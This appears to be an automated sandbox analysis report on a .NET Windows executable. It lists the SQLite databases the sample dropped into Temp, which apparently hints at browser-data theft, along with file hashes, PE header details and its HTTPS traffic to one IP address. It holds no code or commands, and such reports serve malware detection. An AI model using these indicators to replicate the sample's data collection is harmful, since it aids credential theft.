                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp1A47.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):0.7873599747470391
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp3F88.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.37202887060507356
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
                                                                                              MD5:4D950F6445B3766514BA266D6B1F3325
                                                                                              SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
                                                                                              SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
                                                                                              SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp57A8.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):5242880
                                                                                              Entropy (8bit):0.037963276276857943
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp5874.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08235737944063153
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp5884.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp6564.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp8017.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                              Category:dropped
                                                                                              Size (bytes):28672
                                                                                              Entropy (8bit):2.5793180405395284
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp88DF.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.8180424350137764
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmp8900.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpA7A9.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpAB71.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):126976
                                                                                              Entropy (8bit):0.47147045728725767
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpCE60.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):0.7873599747470391
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpCEF8.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):126976
                                                                                              Entropy (8bit):0.47147045728725767
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpCF47.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.35814247679553607
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLiNfJyq1YA5yEHFxOUwa5qguyZ75fOSme2d:TLizym8I6Uwcc25fBlC
                                                                                              MD5:F44DC73F9788D3313E3E25140002587C
                                                                                              SHA1:5AEC4EDC356BC673CBA64FF31148B934A41D44C4
                                                                                              SHA-256:2002C1E5693DD638D840BB9FB04D765482D06BA3106623CE90F6E8E42067A983
                                                                                              SHA-512:E556E3C32C0BC142B08E5C479BF31B6101C9200896DD7FCD74FDD39B2DAEAC8F6DC9BA4F09F3C6715998015AF7317211082D9C811E5F9E32493C9ECD888875D7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}.........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\tmpF10D.tmp.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):5.389677512756009
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:14posdLrGh.exe
                                                                                              File size:50'176 bytes
                                                                                              MD5:b10b3047a2a4a6d75ddb3633906f2613
                                                                                              SHA1:ba4f259d0f41e32ba20cd207b3af46fc430a884b
                                                                                              SHA256:52f30bf4980337fd9e150ac186c5c04d08674bacc468235ecf2ab8f925f889be
                                                                                              SHA512:0054901cd4f43bc2cb54f313e7755db35806e4c331d6ecdd940d72dfe662b88a5edd9d8dba06e744aa437ef8965ce0c8c40597ee4670ba9ddecd2a1cac431602
                                                                                              SSDEEP:768:BBpfJBUjhFu4QwBL5uBdtLaKpImz/yJ1QYP3GD4mvTj:dJ+9HZBL5uBdvImzIl3GD4mvv
                                                                                              TLSH:8833736CED50DA42C815F97BC4F6B100C37570C76323872E6A66ADBA25A736B458E0FC
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g............."...0.X...........R.... ........@.. ....................... ............@................................

                                                                                              File Icon

                                                                                              Icon Hash:90cececece8e8eb0

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x40d752
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xEBCB0C67 [Wed May 11 11:45:43 2095 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd7080x4a.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x6ce.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000xb7580xb800eac351e2c0c5b9c606135249f95eb8b3False0.3670601222826087data5.482830295673005IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xe0000x6ce0x80002792c8b6028fab1f8057ecb27f68c70False0.37255859375data3.7259027700877874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x100000xc0x20040881e16d236a9a5866568282ddfa94aFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_VERSION0xe0a00x442data0.43027522935779816
                                                                                              RT_MANIFEST0xe4e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 8, 2024 13:54:48.627342939 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:48.627388000 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:48.627474070 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:48.637749910 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:48.637763023 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:48.977327108 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:48.977540970 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:48.981714010 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:48.981725931 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:48.981993914 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:49.024367094 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:49.030762911 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:49.076116085 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033516884 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033570051 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033603907 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033626080 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033643961 CEST49730443192.168.2.4172.67.143.245
